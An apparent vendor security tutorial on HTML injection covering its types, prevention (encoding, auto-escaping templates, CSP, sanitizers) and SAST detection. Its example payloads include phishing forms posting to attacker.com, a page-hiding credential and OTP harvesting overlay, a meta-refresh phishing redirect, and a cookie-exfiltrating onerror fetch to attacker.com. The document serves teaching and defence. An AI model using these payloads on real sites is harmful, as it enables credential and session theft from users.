HTML injection is a vulnerability that occurs when an attacker can insert arbitrary HTML markup into a web page viewed by other users. While often overshadowed by its sibling — Cross-Site Scripting (XSS) — HTML injection is a distinct and exploitable vulnerability class that can lead to credential theft, phishing attacks, and defacement even when JavaScript execution is blocked.
What Is HTML Injection?
HTML injection happens when user-supplied input is rendered directly into a page’s HTML without proper encoding, allowing an attacker to control the page’s structure. Unlike XSS, HTML injection does not necessarily involve JavaScript — the attacker injects HTML elements like forms, images, links, or <meta> tags.
Example of the vulnerability:
A page greets users by reflecting the name query parameter:
https://example.com/welcome?name=Alice
Rendered HTML:
<p>Welcome, Alice!</p>
If the application doesn’t encode the input, an attacker can inject:
https://example.com/welcome?name=<h1>Hacked</h1><a+href="https://evil.com">Click+here+to+verify+your+account</a>
Rendered HTML:
<p>Welcome, <h1>Hacked</h1><a href="https://evil.com">Click here to verify your account</a>!</p>
The attacker has inserted a link pointing to a phishing site, and it looks like part of the legitimate application.
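To make the mechanics concrete, here is a minimal Python sketch of a handler with the same flaw. The function name `render_welcome` is hypothetical and stands in for whatever server-side code builds the page. It only illustrates how the query string is decoded and concatenated into markup.

```python
from urllib.parse import parse_qs, urlsplit


def render_welcome(url: str) -> str:
    """Hypothetical vulnerable handler: reflects `name` without encoding."""
    query = parse_qs(urlsplit(url).query)
    # parse_qs turns '+' into a space and decodes percent-escapes,
    # so the attacker's markup arrives intact.
    name = query.get("name", ["guest"])[0]
    # VULNERABLE: untrusted input is concatenated straight into HTML.
    return "<p>Welcome, " + name + "!</p>"


attack_url = (
    'https://example.com/welcome?name=<h1>Hacked</h1>'
    '<a+href="https://evil.com">Click+here+to+verify+your+account</a>'
)
print(render_welcome(attack_url))
```

The printed markup matches the rendered HTML shown above: the `+` characters in the URL become spaces, and the injected link is emitted as live markup.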
HTML Injection vs. Cross-Site Scripting (XSS)
HTML injection and XSS are closely related — XSS is essentially HTML injection where the injected content includes executable JavaScript. The distinction matters for exploitation and detection:
| | HTML Injection | Cross-Site Scripting (XSS) |
|---|---|---|
| Injected content | HTML elements (forms, links, images) | JavaScript + HTML |
| JavaScript required | No | Yes |
| Impact | Phishing, defacement, credential theft | Everything HTML injection can do, plus session theft and arbitrary actions performed as the victim |
| Bypasses CSP? | Sometimes: <form> and <img> tags are not governed by script-src | Largely blocked by a strict CSP |
| CWE reference | CWE-80 | CWE-79 |
HTML injection is particularly dangerous in environments where Content Security Policy (CSP) blocks JavaScript execution. An attacker blocked from injecting <script> tags can still inject <form> tags to harvest credentials, or <img> tags that make the victim's browser issue cross-site GET requests.
Types of HTML Injection
1. Reflected HTML Injection
The injected HTML is returned in the server’s immediate response to a crafted request. This is the most common form and is often delivered via phishing links.
Scenario:
A search page reflects the search query:
GET /search?q=<b>IMPORTANT+NOTICE:+Your+account+has+been+suspended
The server renders:
<div class="results">
You searched for: <b>IMPORTANT NOTICE: Your account has been suspended
</div>
The victim sees bold text claiming their account is suspended — injected entirely through the URL.
2. Stored (Persistent) HTML Injection
The payload is stored in the application’s database and rendered to all users who view the affected content. This is significantly more dangerous because it doesn’t require sending individual phishing links.
Scenario:
A forum application stores post content without sanitization:
<!-- Attacker's post content -->
<div style="position:fixed;top:0;left:0;width:100%;height:100%;background:white;z-index:9999">
<h2>Your session has expired. Please log in again.</h2>
<form action="https://attacker.com/harvest">
Username: <input name="user"><br>
Password: <input type="password" name="pass"><br>
<input type="submit" value="Log In">
</form>
</div>
Every user who views that post sees a fake login form overlaid on the legitimate page. Credentials entered go directly to the attacker’s server.
3. DOM-Based HTML Injection
The injection occurs entirely in the browser through client-side JavaScript that writes user-controlled data to the DOM without proper encoding.
// VULNERABLE: writes URL fragment directly to the page
document.getElementById('greeting').innerHTML =
'Welcome, ' + location.hash.substring(1);
An attacker links to:
https://app.example.com/profile#<img src=x onerror=fetch('https://attacker.com/?c='+document.cookie)>
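The innerHTML assignment parses the injected HTML, including the onerror handler, so this particular payload escalates from HTML injection to DOM-based XSS wherever inline event handlers are allowed to run.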
Real-World HTML Injection Attack Scenarios
Scenario 1: Credential Phishing via Form Injection
The most impactful HTML injection attack injects a fake login form into a trusted domain. Because the form is rendered on the legitimate domain (example-bank.com), users have no visual indication it is malicious.
<!-- Injected into a bank's search results page -->
<style>
body > *:not(#phish-overlay) { display: none !important; }
</style>
<div id="phish-overlay" style="padding:40px;font-family:Arial">
<img src="/assets/logo.png" alt="Bank Logo">
<h3>Security Alert: Please verify your identity</h3>
<form method="POST" action="https://attacker.com/steal">
<label>Username: <input type="text" name="username"></label><br><br>
<label>Password: <input type="password" name="password"></label><br><br>
<label>One-Time Code: <input type="text" name="otp"></label><br><br>
<button type="submit">Verify</button>
</form>
</div>
The injected CSS hides the legitimate page content and the injected form harvests credentials including OTP codes.
Scenario 2: Open Redirect via Meta Refresh
<!-- Injected HTML causes an automatic redirect -->
<meta http-equiv="refresh" content="3;url=https://phishing-site.com">
<p>Please wait while we redirect you to the secure login portal...</p>
Scenario 3: Content Spoofing for Misinformation
On a news or information site:
<!-- Injected into a news article comment -->
<blockquote style="font-size:1.4em;font-weight:bold;border-left:4px solid red;padding:10px">
BREAKING: This website has been compromised. Do not enter any personal information.
Call our security hotline: +1-555-ATTACKER
</blockquote>
Prevention: How to Stop HTML Injection
1. Output Encoding — The Primary Defense
The fundamental fix is encoding all user-supplied data before rendering it as HTML. Output encoding converts HTML special characters to their entity equivalents, preventing them from being interpreted as markup:
| Character | HTML Entity |
|---|---|
| < | &lt; |
| > | &gt; |
| " | &quot; |
| ' | &#x27; |
| & | &amp; |
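As a rough illustration of this mapping, Python's standard library function `html.escape` performs the same substitutions (with `quote=True`, the default, it also encodes both quote characters). The `render_welcome_safe` helper is a hypothetical name used only for this sketch.

```python
import html


def render_welcome_safe(name: str) -> str:
    """Hypothetical handler that HTML-encodes the value at the point of output."""
    return "<p>Welcome, " + html.escape(name, quote=True) + "!</p>"


payload = '<a href="https://evil.com">Click here</a>'

# The markup characters are emitted as entities, so the browser shows
# the payload as literal text instead of building a link element.
print(render_welcome_safe(payload))

# The five characters from the table, encoded in one call.
print(html.escape("<>\"'&"))
```

Encoding happens at the moment the value is written into HTML, which is why the same stored or reflected value can be reused safely in other contexts that apply their own encoding.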
Java (OWASP Java Encoder):
import org.owasp.encoder.Encode;
// VULNERABLE
out.println("<p>Welcome, " + username + "!</p>");
// SECURE: HTML-encode all user data before inserting into HTML context
out.println("<p>Welcome, " + Encode.forHtml(username) + "!</p>");
Python (Django):
{# Django templates auto-escape by default #}
{{ username }} {# Safe: Django HTML-encodes this value #}
{# Bypassing escaping is explicit and dangerous: #}
{{ username|safe }} {# Only if the value has already been sanitized #}
JavaScript (DOM methods):
// VULNERABLE: innerHTML parses HTML, enables injection
document.getElementById('name').innerHTML = userInput;
// SECURE: textContent treats input as literal text — no HTML parsing
document.getElementById('name').textContent = userInput;
Node.js (he library):
const he = require('he');
// SECURE: HTML-encode user input before embedding in HTML strings
const safe = he.encode(userInput);
res.send(`<p>Welcome, ${safe}!</p>`);
2. Use Template Engines with Auto-Escaping
Modern template engines escape variables by default. Use them — and never use “raw/unescaped” output for untrusted data:
{# Jinja2 (Python) — auto-escaped by default #}
<p>Welcome, {{ username }}!</p>
{# Bypassing is explicit — only do this for trusted, pre-sanitized HTML #}
<div>{{ body | safe }}</div>
{{! Handlebars — auto-escaped }}
<p>Welcome, {{username}}!</p>
{{! Triple braces = unescaped — ONLY for trusted content }}
<div>{{{trustedContent}}}</div>
3. Input Validation
Validate that input matches the expected format and reject or sanitize values that don’t. For fields like names or usernames, use an allowlist approach:
import re
def validate_username(username):
    # Only allow alphanumeric, underscore, hyphen; no HTML special chars.
    # fullmatch rejects a trailing newline, which '$' with re.match would accept.
    if not re.fullmatch(r'[a-zA-Z0-9_-]{3,30}', username):
        raise ValueError("Username contains invalid characters")
    return username
Note: Input validation is a defense-in-depth measure, not a replacement for output encoding. Encoding at the point of output is the primary control.
4. Content Security Policy (CSP)
A strong CSP can limit the impact of HTML injection by restricting what injected HTML can do:
Content-Security-Policy:
  default-src 'self';
  script-src 'self' 'nonce-{random}';
  form-action 'self';
  base-uri 'self';
  frame-ancestors 'none';
Key directives for limiting HTML injection impact:
- form-action 'self': prevents injected forms from submitting to external URLs
- base-uri 'self': prevents <base> tag injection that changes relative URL resolution
- frame-ancestors 'none': prevents your page from being framed (limits overlay attacks)
CSP does not fix the underlying HTML injection vulnerability — it reduces the impact. Encoding is still required.
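A minimal sketch of how such a header might be assembled per response is shown below. The function name `build_csp_header` is hypothetical, and how the header is attached to the response depends on your framework. The important detail is that the nonce is freshly generated for every response and never reused.

```python
import secrets


def build_csp_header() -> tuple[str, str]:
    """Return (nonce, header value) for a single response (illustrative only)."""
    # A new unpredictable nonce per response; a static nonce defeats the purpose.
    nonce = secrets.token_urlsafe(16)
    directives = [
        "default-src 'self'",
        f"script-src 'self' 'nonce-{nonce}'",
        "form-action 'self'",      # injected forms cannot post off-site
        "base-uri 'self'",         # injected <base> cannot rewrite relative URLs
        "frame-ancestors 'none'",  # page cannot be framed by other origins
    ]
    return nonce, "; ".join(directives)


nonce, header_value = build_csp_header()
print("Content-Security-Policy:", header_value)
```

The returned nonce would also be placed on each legitimate `<script nonce="...">` tag in the same response, so that only those scripts are allowed to run.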
5. Sanitization for Rich Text Content
When you genuinely need to allow users to submit some HTML (e.g., a WYSIWYG editor for blog posts), use a trusted HTML sanitization library rather than writing your own:
// Node.js — DOMPurify (client-side) or sanitize-html (server-side)
const sanitizeHtml = require('sanitize-html');
const clean = sanitizeHtml(userHtml, {
  allowedTags: ['b', 'i', 'em', 'strong', 'a', 'p', 'ul', 'li'],
  allowedAttributes: {
    'a': ['href'], // Only allow href, not onclick, onmouseover, etc.
  },
  allowedSchemes: ['http', 'https', 'mailto'], // No javascript: URIs
});
# Python: bleach (deprecated by its maintainers in 2023, but still widely deployed)
import bleach
clean = bleach.clean(
    user_html,
    tags={'b', 'i', 'em', 'strong', 'a', 'p'},  # bleach 6.x expects a set here
    attributes={'a': ['href']},
    strip=True,
)
How SAST Tools Detect HTML Injection
A Static Application Security Testing (SAST) tool detects HTML injection through taint analysis: it traces untrusted data from its source (HTTP request parameters, headers, form fields) to HTML output sinks (template render calls, innerHTML, document.write, Response.Write, etc.) and flags any flow that reaches a sink without passing through an encoding function.
The detection logic tracks:
- Source identification: request.GET['name'], req.body.username, $_GET['q'], etc.
- Sink identification: innerHTML =, document.write(), Response.Write(), template output without escaping
- Sanitizer recognition: Encode.forHtml(), he.encode(), escape(), template auto-escaping
- Taint propagation: following the data through function calls, string concatenations, and variable assignments
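The source, sink, sanitizer, and propagation roles can be illustrated with a small runtime analogy. This is only a toy model, not how a SAST engine is implemented: real tools perform the analysis statically over code without running it. The names `Tainted`, `source`, `sanitizer`, and `sink` are all hypothetical.

```python
import html


class Tainted(str):
    """A string marked as originating from an untrusted source."""

    def __add__(self, other):
        # Propagation: tainted + anything stays tainted.
        return Tainted(str(self) + str(other))

    def __radd__(self, other):
        # Propagation: anything + tainted stays tainted.
        return Tainted(str(other) + str(self))


def source(value: str) -> Tainted:
    """Source: stands in for reading a request parameter."""
    return Tainted(value)


def sanitizer(value: str) -> str:
    """Sanitizer: HTML-encodes and returns a plain str, clearing the taint."""
    return html.escape(str(value))


def sink(markup: str) -> str:
    """Sink: stands in for writing HTML to the response."""
    if isinstance(markup, Tainted):
        raise ValueError("tainted data reached an HTML sink")
    return markup


user = source("<b>x</b>")
print(sink("<p>" + sanitizer(user) + "</p>"))  # encoded flow is accepted
try:
    sink("<p>" + user + "</p>")                # unencoded flow is flagged
except ValueError as err:
    print("finding:", err)
```

The model only follows string concatenation. Other operations, such as f-strings or `str.format`, would silently drop the marker, which hints at why production tools need far more complete propagation rules.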
Offensive360’s SAST engine performs this inter-procedural taint analysis across all 60+ supported languages, flagging both reflected and stored HTML injection patterns. Findings include the full data-flow trace from source to sink, a severity rating, CWE-80 mapping, and a recommended fix with a code example.
HTML Injection vs. OWASP Top 10
HTML injection maps to OWASP A03:2021 Injection, the category that absorbed Cross-Site Scripting in the 2021 edition (XSS was a separate entry, A7, in the 2017 list). More specifically:
- CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) — covers cases where HTML injection can lead to script execution
- CWE-116: Improper Encoding or Escaping of Output — the root cause of most HTML injection
It also appears in the OWASP Web Security Testing Guide under WSTG-CLNT-03: Testing for HTML Injection.
Summary
HTML injection is a high-impact vulnerability class that enables phishing, credential theft, and page defacement on legitimate domains. The fix is straightforward — encode all user-supplied data before inserting it into HTML contexts — but the vulnerability appears repeatedly in production applications where one output context is overlooked.
The defense hierarchy:
- Output encode all user data at the point of rendering (primary control)
- Use auto-escaping template engines and avoid bypassing escaping
- Validate input format for fields that don’t need HTML characters
- Apply CSP to limit impact if encoding is missed
- Sanitize with an allowlist library only when HTML input is genuinely required
Running a SAST scan with taint analysis on your codebase will identify every location where user-controlled data reaches an HTML output sink without encoding — the exact pattern that enables HTML injection attacks.